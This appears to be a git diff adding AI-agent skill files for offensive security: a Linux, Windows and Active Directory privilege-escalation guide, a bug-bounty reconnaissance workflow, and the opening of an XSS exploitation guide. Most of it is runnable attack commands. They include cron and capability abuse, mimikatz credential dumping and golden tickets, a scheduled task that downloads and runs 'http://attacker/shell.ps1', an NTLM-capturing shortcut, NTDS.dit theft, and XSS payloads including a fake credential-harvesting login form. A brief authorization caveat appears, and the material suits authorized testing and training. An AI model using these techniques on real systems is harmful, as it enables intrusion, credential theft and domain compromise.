+sudo less /etc/hosts # then type: !bash +sudo man man # then type: !bash +sudo env /bin/bash +``` + +#### 2. Abusing Scheduled Tasks (Cron) + +```bash +# Find writable cron scripts +ls -la /etc/cron* +cat /etc/crontab + +# Inject payload into writable script +echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh +chmod +x /home/user/systemupdate.sh + +# Wait for execution, then: +/bin/bash -p +``` + +#### 3. Abusing Capabilities + +```bash +# Find binaries with capabilities +getcap -r / 2>/dev/null + +# Python with cap_setuid +/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' + +# Perl with cap_setuid +/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' + +# Tar with cap_dac_read_search (read any file) +/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa +/usr/bin/tar -xvf key.tar +``` + +#### 4. NFS Root Squashing + +```bash +# Check for NFS shares +showmount -e + +# Mount and exploit no_root_squash +mkdir /tmp/mount +mount -o rw,vers=2 :/tmp /tmp/mount +cd /tmp/mount +cp /bin/bash . +chmod +s bash +``` + +#### 5. MySQL Running as Root + +```bash +# If MySQL runs as root +mysql -u root -p +\! chmod +s /bin/bash +exit +/bin/bash -p +``` + +--- + +### Windows Privilege Escalation + +#### 1. Token Impersonation + +```powershell +# Using SweetPotato (SeImpersonatePrivilege) +execute-assembly sweetpotato.exe -p beacon.exe + +# Using SharpImpersonation +SharpImpersonation.exe user: technique:ImpersonateLoggedOnuser +``` + +#### 2. Service Abuse + +```powershell +# Using PowerUp +. .\PowerUp.ps1 +Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1' +Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1' +``` + +#### 3. Abusing SeBackupPrivilege + +```powershell +import-module .\SeBackupPrivilegeUtils.dll +import-module .\SeBackupPrivilegeCmdLets.dll +Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit +``` + +#### 4. Abusing SeLoadDriverPrivilege + +```powershell +# Load vulnerable Capcom driver +.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys +.\ExploitCapcom.exe +``` + +#### 5. Abusing GPO + +```powershell +.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" ` + --Author DOMAIN\ --Command "cmd.exe" ` + --Arguments "/c net user Administrator Password!@# /domain" ` + --GPOName "ADDITIONAL DC CONFIGURATION" +``` + +--- + +### Active Directory Attacks + +#### 1. Kerberoasting + +```bash +# Using Impacket +GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request + +# Using CrackMapExec +crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt +``` + +#### 2. AS-REP Roasting + +```powershell +.\Rubeus.exe asreproast +``` + +#### 3. Golden Ticket + +```powershell +# DCSync to get krbtgt hash +mimikatz# lsadump::dcsync /user:krbtgt + +# Create golden ticket +mimikatz# kerberos::golden /user:Administrator /domain:domain.local ` + /sid:S-1-5-21-... /rc4: /id:500 +``` + +#### 4. Pass-the-Ticket + +```powershell +.\Rubeus.exe asktgt /user:USER$ /rc4: /ptt +klist # Verify ticket +``` + +#### 5. Golden Ticket with Scheduled Tasks + +```powershell +# 1. Elevate and dump credentials +mimikatz# token::elevate +mimikatz# vault::cred /patch +mimikatz# lsadump::lsa /patch + +# 2. Create golden ticket +mimikatz# kerberos::golden /user:Administrator /rc4: ` + /domain:DOMAIN /sid: /ticket:ticket.kirbi + +# 3. Create scheduled task +schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" ` + /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'" +schtasks /run /s DOMAIN /TN "enterprise" +``` + +--- + +### Credential Harvesting + +#### LLMNR Poisoning + +```bash +# Start Responder +responder -I eth1 -v + +# Create malicious shortcut (Book.url) +[InternetShortcut] +URL=https://facebook.com +IconIndex=0 +IconFile=\\attacker_ip\not_found.ico +``` + +#### NTLM Relay + +```bash +responder -I eth1 -v +ntlmrelayx.py -tf targets.txt -smb2support +``` + +#### Dumping with VSS + +```powershell +vssadmin create shadow /for=C: +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\ +``` + +--- + +## Quick Reference + +| Technique | OS | Domain Required | Tool | +|-----------|-----|-----------------|------| +| Sudo Binary Abuse | Linux | No | GTFOBins | +| Cron Job Exploit | Linux | No | Manual | +| Capability Abuse | Linux | No | getcap | +| NFS no_root_squash | Linux | No | mount | +| Token Impersonation | Windows | No | SweetPotato | +| Service Abuse | Windows | No | PowerUp | +| Kerberoasting | Windows | Yes | Rubeus/Impacket | +| AS-REP Roasting | Windows | Yes | Rubeus | +| Golden Ticket | Windows | Yes | Mimikatz | +| Pass-the-Ticket | Windows | Yes | Rubeus | +| DCSync | Windows | Yes | Mimikatz | +| LLMNR Poisoning | Windows | Yes | Responder | + +--- + +## Constraints + +**Must:** +- Have initial shell access before attempting escalation +- Verify target OS and environment before selecting technique +- Use appropriate tool for domain vs local escalation + +**Must Not:** +- Attempt techniques on production systems without authorization +- Leave persistence mechanisms without client approval +- Ignore detection mechanisms (EDR, SIEM) + +**Should:** +- Enumerate thoroughly before exploitation +- Document all successful escalation paths +- Clean up artifacts after engagement + +--- + +## Examples + +### Example 1: Linux Sudo to Root + +```bash +# Check sudo permissions +$ sudo -l +User www-data may run the following commands: + (root) NOPASSWD: /usr/bin/vim + +# Exploit vim +$ sudo vim -c ':!/bin/bash' +root@target:~# id +uid=0(root) gid=0(root) groups=0(root) +``` + +### Example 2: Windows Kerberoasting + +```bash +# Request service tickets +$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request + +# Crack with hashcat +$ hashcat -m 13100 hashes.txt rockyou.txt +``` + +--- + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) | +| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz | +| Kerberoasting returns no hashes | Check for service accounts with SPNs | +| Token impersonation fails | Verify SeImpersonatePrivilege is present | +| NFS mount fails | Check NFS version compatibility (vers=2,3,4) | + +--- + +## Additional Resources + +For detailed enumeration scripts, use: +- **LinPEAS**: Linux privilege escalation enumeration +- **WinPEAS**: Windows privilege escalation enumeration +- **BloodHound**: Active Directory attack path mapping +- **GTFOBins**: Unix binary exploitation reference diff --git a/skills/red-team-tools/SKILL.md b/skills/red-team-tools/SKILL.md new file mode 100644 index 00000000..a5b26b9e --- /dev/null +++ b/skills/red-team-tools/SKILL.md @@ -0,0 +1,307 @@ +--- +name: Red Team Tools and Methodology +description: This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters. +--- + +# Red Team Tools and Methodology + +## Purpose + +Implement proven methodologies and tool workflows from top security researchers for effective reconnaissance, vulnerability discovery, and bug bounty hunting. Automate common tasks while maintaining thorough coverage of attack surfaces. + +## Inputs/Prerequisites + +- Target scope definition (domains, IP ranges, applications) +- Linux-based attack machine (Kali, Ubuntu) +- Bug bounty program rules and scope +- Tool dependencies installed (Go, Python, Ruby) +- API keys for various services (Shodan, Censys, etc.) + +## Outputs/Deliverables + +- Comprehensive subdomain enumeration +- Live host discovery and technology fingerprinting +- Identified vulnerabilities and attack vectors +- Automated recon pipeline outputs +- Documented findings for reporting + +## Core Workflow + +### 1. Project Tracking and Acquisitions + +Set up reconnaissance tracking: + +```bash +# Create project structure +mkdir -p target/{recon,vulns,reports} +cd target + +# Find acquisitions using Crunchbase +# Search manually for subsidiary companies + +# Get ASN for targets +amass intel -org "Target Company" -src + +# Alternative ASN lookup +curl -s "https://bgp.he.net/search?search=targetcompany&commit=Search" +``` + +### 2. Subdomain Enumeration + +Comprehensive subdomain discovery: + +```bash +# Create wildcards file +echo "target.com" > wildcards + +# Run Amass passively +amass enum -passive -d target.com -src -o amass_passive.txt + +# Run Amass actively +amass enum -active -d target.com -src -o amass_active.txt + +# Use Subfinder +subfinder -d target.com -silent -o subfinder.txt + +# Asset discovery +cat wildcards | assetfinder --subs-only | anew domains.txt + +# Alternative subdomain tools +findomain -t target.com -o + +# Generate permutations with dnsgen +cat domains.txt | dnsgen - | httprobe > permuted.txt + +# Combine all sources +cat amass_*.txt subfinder.txt | sort -u > all_subs.txt +``` + +### 3. Live Host Discovery + +Identify responding hosts: + +```bash +# Check which hosts are live with httprobe +cat domains.txt | httprobe -c 80 --prefer-https | anew hosts.txt + +# Use httpx for more details +cat domains.txt | httpx -title -tech-detect -status-code -o live_hosts.txt + +# Alternative with massdns +massdns -r resolvers.txt -t A -o S domains.txt > resolved.txt +``` + +### 4. Technology Fingerprinting + +Identify technologies for targeted attacks: + +```bash +# Whatweb scanning +whatweb -i hosts.txt -a 3 -v > tech_stack.txt + +# Nuclei technology detection +nuclei -l hosts.txt -t technologies/ -o tech_nuclei.txt + +# Wappalyzer (if available) +# Browser extension for manual review +``` + +### 5. Content Discovery + +Find hidden endpoints and files: + +```bash +# Directory bruteforce with ffuf +ffuf -ac -v -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt + +# Historical URLs from Wayback +waybackurls target.com | tee wayback.txt + +# Find all URLs with gau +gau target.com | tee all_urls.txt + +# Parameter discovery +cat all_urls.txt | grep "=" | sort -u > params.txt + +# Generate custom wordlist from historical data +cat all_urls.txt | unfurl paths | sort -u > custom_wordlist.txt +``` + +### 6. Application Analysis (Jason Haddix Method) + +**Heat Map Priority Areas:** + +1. **File Uploads** - Test for injection, XXE, SSRF, shell upload +2. **Content Types** - Filter Burp for multipart forms +3. **APIs** - Look for hidden methods, lack of auth +4. **Profile Sections** - Stored XSS, custom fields +5. **Integrations** - SSRF through third parties +6. **Error Pages** - Exotic injection points + +**Analysis Questions:** +- How does the app pass data? (Params, API, Hybrid) +- Where does the app talk about users? (UID, UUID endpoints) +- Does the site have multi-tenancy or user levels? +- Does it have a unique threat model? +- How does the site handle XSS/CSRF? +- Has the site had past writeups/exploits? + +### 7. Automated XSS Hunting + +```bash +# ParamSpider for parameter extraction +python3 paramspider.py --domain target.com -o params.txt + +# Filter with Gxss +cat params.txt | Gxss -p test + +# Dalfox for XSS testing +cat params.txt | dalfox pipe --mining-dict params.txt -o xss_results.txt + +# Alternative workflow +waybackurls target.com | grep "=" | qsreplace '">' | while read url; do + curl -s "$url" | grep -q 'alert(1)' && echo "$url" +done > potential_xss.txt +``` + +### 8. Vulnerability Scanning + +```bash +# Nuclei comprehensive scan +nuclei -l hosts.txt -t ~/nuclei-templates/ -o nuclei_results.txt + +# Check for common CVEs +nuclei -l hosts.txt -t cves/ -o cve_results.txt + +# Web vulnerabilities +nuclei -l hosts.txt -t vulnerabilities/ -o vuln_results.txt +``` + +### 9. API Enumeration + +**Wordlists for API fuzzing:** + +```bash +# Enumerate API endpoints +ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt + +# Test API versions +ffuf -u https://target.com/api/v1/FUZZ -w api_wordlist.txt +ffuf -u https://target.com/api/v2/FUZZ -w api_wordlist.txt + +# Check for hidden methods +for method in GET POST PUT DELETE PATCH; do + curl -X $method https://target.com/api/users -v +done +``` + +### 10. Automated Recon Script + +```bash +#!/bin/bash +domain=$1 + +if [[ -z $domain ]]; then + echo "Usage: ./recon.sh " + exit 1 +fi + +mkdir -p "$domain" + +# Subdomain enumeration +echo "[*] Enumerating subdomains..." +subfinder -d "$domain" -silent > "$domain/subs.txt" + +# Live host discovery +echo "[*] Finding live hosts..." +cat "$domain/subs.txt" | httpx -title -tech-detect -status-code > "$domain/live.txt" + +# URL collection +echo "[*] Collecting URLs..." +cat "$domain/live.txt" | waybackurls > "$domain/urls.txt" + +# Nuclei scanning +echo "[*] Running Nuclei..." +nuclei -l "$domain/live.txt" -o "$domain/nuclei.txt" + +echo "[+] Recon complete!" +``` + +## Quick Reference + +### Essential Tools + +| Tool | Purpose | +|------|---------| +| Amass | Subdomain enumeration | +| Subfinder | Fast subdomain discovery | +| httpx/httprobe | Live host detection | +| ffuf | Content discovery | +| Nuclei | Vulnerability scanning | +| Burp Suite | Manual testing | +| Dalfox | XSS automation | +| waybackurls | Historical URL mining | + +### Key API Endpoints to Check + +``` +/api/v1/users +/api/v1/admin +/api/v1/profile +/api/users/me +/api/config +/api/debug +/api/swagger +/api/graphql +``` + +### XSS Filter Testing + +```html + +

+ + + + + + + + + + +``` + +Monitor for: +- Raw HTML reflection without encoding +- Partial encoding (some characters escaped) +- JavaScript execution in browser console +- DOM modifications visible in inspector + +#### Determine XSS Type + +**Stored XSS Indicators:** +- Input persists after page refresh +- Other users see injected content +- Content stored in database/filesystem + +**Reflected XSS Indicators:** +- Input appears only in current response +- Requires victim to click crafted URL +- No persistence across sessions + +**DOM-Based XSS Indicators:** +- Input processed by client-side JavaScript +- Server response doesn't contain payload +- Exploitation occurs entirely in browser + +### Phase 2: Stored XSS Exploitation + +#### Identify Storage Locations +Target areas with persistent user content: + +``` +- Comment sections and forums +- User profile fields (display name, bio, location) +- Product reviews and ratings +- Private messages and chat systems +- File upload metadata (filename, description) +- Configuration settings and preferences +``` + +#### Craft Persistent Payloads + +```html + + + + + + + + + + +
+

Session Expired - Please Login

+
+Username:
+Password:
+ + +
+``` + +### Phase 3: Reflected XSS Exploitation + +#### Construct Malicious URLs +Build URLs containing XSS payloads: + +``` +# Basic reflected payload +https://target.com/search?q= + +# URL-encoded payload +https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E + +# Event handler in parameter +https://target.com/page?name="> + +# Fragment-based (for DOM XSS) +https://target.com/page# +``` + +#### Delivery Methods +Techniques for delivering reflected XSS to victims: + +``` +1. Phishing emails with crafted links +2. Social media message distribution +3. URL shorteners to obscure payload +4. QR codes encoding malicious URLs +5. Redirect chains through trusted domains +``` + +### Phase 4: DOM-Based XSS Exploitation + +#### Identify Vulnerable Sinks +Locate JavaScript functions that process user input: + +```javascript +// Dangerous sinks +document.write() +document.writeln() +element.innerHTML +element.outerHTML +element.insertAdjacentHTML() +eval() +setTimeout() +setInterval() +Function() +location.href +location.assign() +location.replace() +``` + +#### Identify Sources +Locate where user-controlled data enters the application: + +```javascript +// User-controllable sources +location.hash +location.search +location.href +document.URL +document.referrer +window.name +postMessage data +localStorage/sessionStorage +``` + +#### DOM XSS Payloads + +```javascript +// Hash-based injection +https://target.com/page# + +// URL parameter injection (processed client-side) +https://target.com/page?default= + +// PostMessage exploitation +// On attacker page: + + +``` + +### Phase 5: HTML Injection Techniques + +#### Reflected HTML Injection +Modify page appearance without JavaScript: + +```html + +

SITE HACKED

+ + + + + + + + + + + + +``` + +#### Stored HTML Injection +Persistent content manipulation: + +```html + +Important Security Notice: Your account is compromised! + + + + + +
+Fake login form or misleading content here +
+``` + +### Phase 6: Filter Bypass Techniques + +#### Tag and Attribute Variations + +```html + + + + + + + + +
+